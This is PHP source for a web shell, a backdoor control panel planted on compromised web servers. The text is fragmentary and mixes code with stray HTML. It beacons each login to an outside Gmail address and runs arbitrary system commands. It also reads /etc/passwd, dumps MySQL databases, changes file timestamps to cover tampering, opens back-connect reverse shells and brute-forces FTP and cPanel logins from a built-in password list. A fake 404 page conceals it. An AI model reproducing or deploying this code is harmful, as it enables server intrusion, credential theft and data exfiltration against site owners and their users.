$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*================= Info Login ================*/ $admin = array(); $admin['check'] = true; $admin['pass'] = 'niemdamme'; // Password login $admin['cookiepre'] = ''; $admin['cookiedomain'] = ''; $admin['cookiepath'] = '/'; $admin['cookielife'] = 86400; /*===================== End =====================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Login =====================*/ if ($action == "logout") { scookie('vbapass', '', -86400 * 365); p(''); p('
'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('vbapass', $password); $time_shell = "" . date("d/m/Y - H:i:s") . ""; $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . ''; $to_email = 'dimitriuskan@gmail.com'; $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . ""; $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\nReply-to: $from_shellcode"; @mail($to_email, $server_mail, $linkcr, $header); p(''); p('
Loading
|
|
||
[Server IP: " . gethostbyname($_SERVER['SERVER_NAME']) . ""; ?> - Your IP: " . $_SERVER['REMOTE_ADDR'] . ""; ?>] File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | Brute | /etc/passwd | Back Connect |
'goaction'));
makehide('action');
formfoot();
$errmsg && m($errmsg);
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir . '/';
}
$uedir = ue($dir);
if (!$action || $action == 'file') {
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile . ' directory does not exist');
} else {
m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
}
} elseif ($newdirname) {
$mkdirs = $nowpath . $newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created ' . (@mkdir($mkdirs, 0755) ? 'success' : 'failed'));
@chmod($mkdirs, 0755);
}
} elseif ($doupfile) {
m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
} elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename, 'w');
m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
@fclose($fp);
} elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm, 8, 10);
m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
}
} elseif ($oldname && $newfilename) {
$nname = $nowpath . $newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname . ' has already existed or original file does not exist');
} else {
m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
}
} elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
}
} elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
}
} elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile) . ' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
}
} elseif ($doing == 'downrar') {
if ($dl) {
$dfiles = '';
foreach ($dl as $filepath => $value) {
$dfiles.= $filepath . ',';
}
$dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
$dl = explode(',', $dfiles);
$zip = new PHPZip($dl);
$code = $zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: ' . strlen($code));
header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . 'sql.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
} elseif ($doing == 'delfiles') {
if ($dl) {
$dfiles = '';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
} else {
m('Please select file(s)');
}
}
formhead(array('name' => 'createdir'));
makehide('newdirname');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all - $free;
$used_percent = @round(100 / ($all / $free), 2);
p('File Manager Current disk free ' . sizecount($free) . ' of ' . sizecount($all) . ' (' . $used_percent . '%)');
?>
| ||||||
');
p(' | ||||||
Filename | Last modified | Size | Chmod / Perms | Action | ||
0 | '); p('' . $dirdb['filename'] . ' | '); p('' . $dirdb['mtime'] . ' | '); p('-- | '); p(''); p('' . $dirdb['dirchmod'] . ' / '); p('' . $dirdb['dirperm'] . '' . $dirdb['fileowner'] . ' | '); p('Del | Rename | '); p('|
= | Parent Directory | '); p('|||||
'); p('DBHost:'); makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost)); p(':'); makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport)); p('DBUser:'); makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser)); p('DBPass:'); makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass)); p('DBName:'); makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname)); p('DBCharset:'); makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset)); p('
'); formfoot(); p(''); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if (isset($dbhost)) { $dbform.= "\n"; } if (isset($dbuser)) { $dbform.= "\n"; } if (isset($dbpass)) { $dbform.= "\n"; } if (isset($dbport)) { $dbform.= "\n"; } if (isset($dbname)) { $dbform.= "\n"; } if (isset($charset)) { $dbform.= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $table = array_flip($table); $fp = @fopen($path, 'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p(''); p('DBHost:'); makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost)); p(':'); makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport)); p('DBUser:'); makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser)); p('DBPass:'); makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass)); p('DBCharset:'); makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset)); makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt')); p('
'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action', 'sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); formhead(array('name' => 'setdbname')); makehide('action', 'sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name' => 'settable')); makehide('action', 'sqladmin'); p($dbform); makehide('tablename'); makehide('page', $page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if ($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $mysqlver = mysql_get_server_info(); p('MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '
'); $highver = $mysqlver > '4.1' ? 1 : 0; $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while ($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1)); $tabledb = array(); if ($dbname) { p(''); p('Current dababase: ' . $dbname . ''); if ($tablename) { p(' | Current Table: ' . $tablename . ' [ Insert | Structure | Drop ]'); } p('
'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query . " LIMIT $start_limit, $pagenum"; $allowedit = 1; } p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('Field | '); p('Type | '); p('Null | '); p('Key | '); p('Default | '); p('Extra | '); p('
' . $row['Field'] . ' | '); p('' . $row['Type'] . ' | '); p('' . $row['Null'] . ' | '); p('' . $row['Key'] . ' | '); p('' . $row['Default'] . ' | '); p('' . $row['Extra'] . ' | '); p('
Action | '); $fieldnum = @mysql_num_fields($result); for ($i = 0;$i < $fieldnum;$i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len) | ");
}
p('
' . html_clean($inside) . ' | '; } $where = base64_encode($where); if ($allowedit) p('Edit | Del | '); p($b1); p('
'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt')); p('
'); formfoot(); } elseif ($action == 'brute') { formhead(array('title' => 'Brute Forcer')); makehide('action', 'brute'); makehide('dir', $brute); @ini_set('memory_limit', 1000000000000); $connect_timeout = 5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "123pass 123!@# 123admin 123abc 123456admin 1234554321 12344321 pass123 admin admincp administrator matkhau passadmin p@ssword password 012345 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 234234 345345 456456 567567 678678 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin123 admin123456 abcdef abcabc !@#!@# !@#$%^ !@#$%^&*( !@#$$#@! abc123 anhyeuem iloveyou admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if ($target == '') { $target = 'localhost'; } print "";
?>
Error : Connection timed out , make confidence about validation of target !";
exit;
} elseif (curl_errno($ch) == 0) {
p("[ Leorius@live.com ]#
Attacking has been done! Username: $user / Password: $pass => Login
");
}
curl_close($ch);
}
function cpanel_check($host, $user, $pass, $timeout) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if (curl_errno($ch) == 28) {
print " Error : Connection timed out , make confidence about validation of target !";
exit;
} elseif (curl_errno($ch) == 0) {
p("[ Leorius@live.com ]# Attacking has been done! Username: $user / Password: $pass
");
}
curl_close($ch);
}
if (isset($submit) && !empty($submit)) {
$userlist = explode("\n", $users);
$passlist = explode("\n", $pass);
p('[ Leorius@live.com ]# Attacking ...
');
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password) {
$_pass = trim($password);
if ($option == "ftp") {
ftp_check($target, $_user, $_pass, $connect_timeout);
}
if ($option == "cpanel") {
cpanel_check($target, $_user, $_pass, $connect_timeout);
}
}
}
}
formfoot();
} elseif ($action == 'etcpwd') {
formhead(array('title' => 'Get /etc/passwd'));
makehide('action', 'etcpwd');
makehide('dir', $nowpath);
$i = 0;
echo "
Instead »'); p('year:'); makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4)); p('month:'); makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2)); p('day:'); makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2)); p('hour:'); makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2)); p('minute:'); makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2)); p('second:'); makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2)); p('
'); formfooter(); } elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if ($program && $parameter) { $shell = new COM('Shell.Application'); $a = $shell->ShellExecute($program, $parameter); m('Program run has ' . (!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt'; formhead(array('title' => 'Execute Program')); makehide('action', 'shell'); makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1)); p(''); makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter)); makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute')); p('
'); formfoot(); } formhead(array('title' => 'Execute Command')); makehide('action', 'shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open'); makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1)); } p(''); makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command)); makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute')); p('
'); formfoot(); if ($command) { p(''); if ($execfunc == 'wscript' && IS_WIN && IS_COM) { $wsh = new COM('WScript.shell'); $exec = $wsh->exec('cmd.exe /c ' . $command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) { $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w')); $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command . "\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); } } else { echo (execute($command)); } p(''); } } elseif ($action == 'phpenv') { $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),); if ($phpvarname) { m($phpvarname . ' : ' . getcfg($phpvarname)); } formhead(array('title' => 'Server environment')); makehide('action', 'phpenv'); makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1)); formfooter(); $hp = array(0 => 'Server', 1 => 'PHP'); for ($a = 0;$a < 2;$a++) { p('
Pages: ' . $multipage . '
' : ''; } return $multipage; } function loginpage() { ?>The requested URL / was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
$arg[title]
"); } else { p("$arg[title]"); } } function makeselect($arg = array()) { if ($arg['onchange']) { $onchange = 'onchange="' . $arg['onchange'] . '"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p(''); p("$arg[title] "); if ($arg['newline']) p('
'); } function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("'); } function formfoot() { p(''); } function pr($a) { echo ''; print_r($a); echo ''; }